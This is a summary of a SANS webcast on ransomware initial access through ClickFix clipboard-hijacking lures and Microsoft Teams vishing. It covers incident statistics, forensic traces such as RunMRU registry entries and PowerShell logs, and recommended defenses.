Stay Ahead of Ransomware - Initial Access via Evolving Social Engineering

The April 2026 SANS "Stay Ahead of Ransomware" livestream focused on evolving social‑engineering techniques that grant attackers initial access. Hosts Ryan Chapman and Mary Degrazia examined two prominent vectors: the ClickFix scheme, which lures users to a fake capture page that hijacks the clipboard and executes PowerShell via the Windows R dialog, and Microsoft Teams‑based vishing, where threat actors impersonate trusted contacts to deliver malicious links that trigger remote‑access tools.

Data presented highlighted a dramatic 517 % rise in ClickFix incidents during 2025, now rivaling traditional RDP and VPN exploits. The presenters referenced Coveware and Unit 42 reports showing the technique’s spread across high‑tech, manufacturing, real‑estate, and other industries. They demonstrated how the Run‑MRU registry key preserves the malicious command history, and emphasized that PowerShell logging—when enabled—captures the subsequent payload execution, providing forensic breadcrumbs.

Mary illustrated a live‑recorded scenario: a user receives a trusted‑friend email, follows a verification link, and is prompted to press Windows R and paste a clipboard‑copied PowerShell command. The victim’s repeated attempts generate multiple Run‑MRU entries and email threads, which investigators can trace. Ryan complemented this with a walkthrough of Teams‑based phishing, showing how quick‑assist and remote‑monitoring tools are abused after a successful vishing call.

The discussion underscored the need for proactive defenses: enforce strict PowerShell logging, monitor Run‑MRU registry activity, and conduct regular user awareness training on clipboard hijacking and Teams vishing. Organizations that harden remote‑access services and educate staff can significantly lower the probability of ransomware deployment originating from these social‑engineering tactics.